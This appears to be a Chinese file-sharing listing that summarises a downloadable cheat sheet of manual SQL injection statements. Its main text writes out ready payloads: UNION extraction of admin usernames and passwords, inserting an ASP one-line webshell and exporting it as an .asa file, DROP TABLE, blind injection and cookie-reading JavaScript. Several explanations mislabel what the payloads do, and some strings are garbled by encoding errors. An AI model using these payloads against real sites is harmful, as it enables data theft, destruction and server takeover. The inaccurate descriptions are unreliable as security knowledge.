手工注入攻击语句总结
需积分: 5 51 浏览量
更新于2024-09-07
收藏 29KB TXT 举报
手工注入通用语句总结偏
手工注入是一种常见的 Web 应用程序安全漏洞,攻击者可以通过在输入字段中注入恶意代码来获取未经授权的访问权限。以下是手工注入通用语句总结偏的知识点:
1. **Union Injection**:攻击者可以使用 Union 语句来获取多个表的数据。例如,`union select top 11,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,username,19,20,21 from (select top 1 username,password from admin where 1=1 order by username) t`。
2. **Insert 语句**:攻击者可以使用 Insert 语句来插入恶意数据。例如,`insert into cmd(a) values (<%execute request(chr(35))%>)`。
3. **Select 语句**:攻击者可以使用 Select 语句来获取敏感数据。例如,`select * into [a] in D:\wwwroot\M3loee.asa;.xls excel 4.0; from cmd;`。
4. **Drop 语句**:攻击者可以使用 Drop 语句来删除表或数据库。例如,`drop table cmd;`。
5. **基于时间的盲注**:攻击者可以使用基于时间的盲注来获取敏感数据。例如,`and 1=1 and sleep(5)`。
6. **基于报错的盲注**:攻击者可以使用基于报错的盲注来获取敏感数据。例如,`and 1=2 union select 1,2,3`。
7. **JavaScript 注入**:攻击者可以使用 JavaScript 注入来获取 Cookie 等敏感信息。例如,`javascript:alert(document.cookie="id="+escape("123"));`。
8. **字符编码**:攻击者可以使用字符编码来 bypass 输入验证。例如,`%2525%2527%09and%091=1%23α룬%09ո`。
9. **逻辑运算符**:攻击者可以使用逻辑运算符来构造恶意查询。例如,`'and 1=1 and 1=2'`。
10. **OR 语句**:攻击者可以使用 OR 语句来构造恶意查询。例如,`'or 1=1 or 1=2'`。
11. **LIKE 语句**:攻击者可以使用 LIKE 语句来构造恶意查询。例如,`'or a='a'`。
12. **Cookie 注入**:攻击者可以使用 Cookie 注入来获取敏感信息。例如,`/ewebeditor.asp?id=1&style=standardcookiesע`。
手工注入通用语句总结偏是一份非常危险的攻击工具,需要网站管理员和开发者高度警惕和防范。
2013-06-20 上传
2023-05-24 上传
2019-01-08 上传
2021-01-31 上传
2024-07-23 上传
点击了解资源详情
点击了解资源详情
2024-11-12 上传
总有刁民想害朕WSG
- 粉丝: 7
- 资源: 282
最新资源
- 前端协作项目:发布猜图游戏功能与待修复事项
- Spring框架REST服务开发实践指南
- ALU课设实现基础与高级运算功能
- 深入了解STK:C++音频信号处理综合工具套件
- 华中科技大学电信学院软件无线电实验资料汇总
- CGSN数据解析与集成验证工具集:Python和Shell脚本
- Java实现的远程视频会议系统开发教程
- Change-OEM: 用Java修改Windows OEM信息与Logo
- cmnd:文本到远程API的桥接平台开发
- 解决BIOS刷写错误28:PRR.exe的应用与效果
- 深度学习对抗攻击库:adversarial_robustness_toolbox 1.10.0
- Win7系统CP2102驱动下载与安装指南
- 深入理解Java中的函数式编程技巧
- GY-906 MLX90614ESF传感器模块温度采集应用资料
- Adversarial Robustness Toolbox 1.15.1 工具包安装教程
- GNU Radio的供应商中立SDR开发包:gr-sdr介绍